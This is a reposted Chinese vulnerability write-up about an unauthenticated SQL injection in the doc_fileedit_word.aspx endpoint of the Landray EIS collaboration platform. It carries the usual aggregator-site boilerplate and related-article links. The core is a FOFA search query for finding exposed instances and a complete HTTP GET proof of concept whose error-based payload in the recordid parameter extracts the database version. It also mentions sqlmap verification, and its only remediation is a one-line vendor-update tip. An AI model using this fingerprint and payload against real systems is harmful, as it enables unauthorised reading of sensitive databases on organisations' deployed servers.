蓝凌EIS智慧协同平台 doc_fileedit_word.aspx 存在 SQL注入漏洞

这篇具有很好参考价值的文章主要介绍了蓝凌EIS智慧协同平台 doc_fileedit_word.aspx 存在 SQL注入漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

产品简介

蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能,旨在提升企业内部沟通、协作和信息共享的效率。

漏洞概述

由于蓝凌EIS智慧协同平台 doc_fileedit_word.aspx接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。

指纹识别

fofa:

app="Landray-EIS智慧协同平台"

漏洞利用

poc:

GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: your_ip
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

查询数据库版本
蓝凌eissql注入,漏洞复现,word,sql,数据库,网络安全,web安全,安全

sqlmap验证
蓝凌eissql注入,漏洞复现,word,sql,数据库,网络安全,web安全,安全

修复建议

联系软件厂商更新至最新安全版本文章来源地址https://www.toymoban.com/news/detail-824843.html

到了这里,关于蓝凌EIS智慧协同平台 doc_fileedit_word.aspx 存在 SQL注入漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • ALVA 中标中臣数控项目,AR 远程协同助力烟草行业智慧升级

    喜报 | ALVA 中标中臣数控项目,AR 远程协同助力烟草行业智慧升级 2024-01-11 18:04:00 近日,ALVA Systems 中标上海中臣烟草数控技术有限公司(上海烟草机械有限责任公司下属企业)智能工厂 AR 远程协助系统开发项目。   *中标公告截图 该项目旨在通过 AR 远程协助应用赋能烟草行

    2024年01月24日
    浏览(40)
  • 基于边缘无线协同感知的低功耗物联网LPIOT技术:赋能智慧园区方案以及数字工厂领域

    回到2000年左右,物联网的底层技术支撑还是“ZigBee”,虽然当时ZigBee的终端功耗指标其实也并不庞大,但是,“拓扑复杂导致工程实施难度大”、“网络规模小导致的整体效率低下”都成为限制其发展的主要因素。 LPWAN,新一代物联网底层通讯技术,LPWAN技术的出现解决了上面

    2024年02月14日
    浏览(41)
  • 毕业设计-基于协同过滤算法的电商平台推荐系统

    目录 前言 课题背景和意义 实现技术思路 一、文献综述 二、基于用户协同过滤推荐系统算法 三、实证分析 四、总结 实现效果图样例 最后     📅大四是整个大学期间最忙碌的时光,一边要忙着备考或实习为毕业后面临的就业升学做准备,一边要为毕业设计耗费大量精力。近几

    2024年02月08日
    浏览(53)
  • 一站式敏捷研发协同平台,敏捷研发解决方案

     Leangoo领歌是一款 永久免费的专业的敏捷开发管理工具 ,提供端到端敏捷研发管理解决方案,涵盖敏捷需求管理、任务协同、进展跟踪、统计度量等。 Leangoo领歌上手快、实施成本低,可帮助企业快速落地敏捷,提质增效、缩短周期、加速创新。 Leangoo领歌区别于传统项目管

    2024年01月24日
    浏览(51)
  • 低代码平台协同OA升级,促进金融企业信息化建设

    编者按:数字化办公是信息化时代每个企业不可避免的,OA系统是数字化办公的关键环节。如何与时俱进,保持企业的活力,增强企业综合竞争力?本文分析了企业OA系统为什么需要升级,并进一步指出如何实现升级。 :OA升级,低代码平台,老厂商,信息化建设 OA系统

    2024年02月16日
    浏览(51)
  • 企业级WIKI协同工作平台搭建指南:Confluence深度使用与安装

    本文详细介绍了Confluence软件的特性和安装过程,Confluence是一款功能强大的办公软件,支持在线文档编辑、团队协作和内容管理。文章首先概述了Confluence的核心特性,包括空间管理、页面版本控制、编辑器功能、宏和附件管理等。

    2024年01月16日
    浏览(59)
  • 语义网与云计算:如何实现跨平台的数据共享和协同

    语义网和云计算是当今最热门的技术趋势之一,它们为人工智能、大数据分析和实时数据处理提供了强大的支持。在这篇文章中,我们将深入探讨语义网和云计算的核心概念、算法原理、实例代码和未来发展趋势。 语义网是一种基于语义技术的网络,它旨在解决信息的语义差

    2024年04月15日
    浏览(43)
  • 开源创新 协同融合|2023 开放原子全球开源峰会开源协作平台分论坛即将启幕

    由开放原子开源基金会主办,阿里云、CSDN 等单位共同承办的开源协作平台分论坛即将于 6 月 12 日上午在北京经开区北人亦创国际会展中心隆重召开。 作为 2023 开放原子全球开源峰会的重要组成部分,开源协作平台分论坛将聚焦于开源代码平台的创新功能、用户体验以及核心

    2024年02月07日
    浏览(62)
  • 中移链与BSN分布式云管平台集成,共同构建专属协同体系

    01 中移链与BSN分布式云管平台集成, 融入BSN生态体系 中移链OPB(OPB即开放联盟链,Open Permissioned Blockchain)与BSN基于BSN分布式云管平台,打造了中移链专属门户、中移链专属运营、中移链专属运维功能模块,在BSN分布式云管平台中构建专属于中移链的协同运作体系,为BSN分布

    2024年02月16日
    浏览(42)
  • 【1day】​万户协同办公平台 iSignatureHTML.jsp/DocumentEdit.jsp 文件SQL注入漏洞学习

    注:该文章来自作者日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与作者无关。 目录 一、漏洞描述 二、影响版本 三、资产测绘  四、漏洞复现 

    2024年02月03日
    浏览(57)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包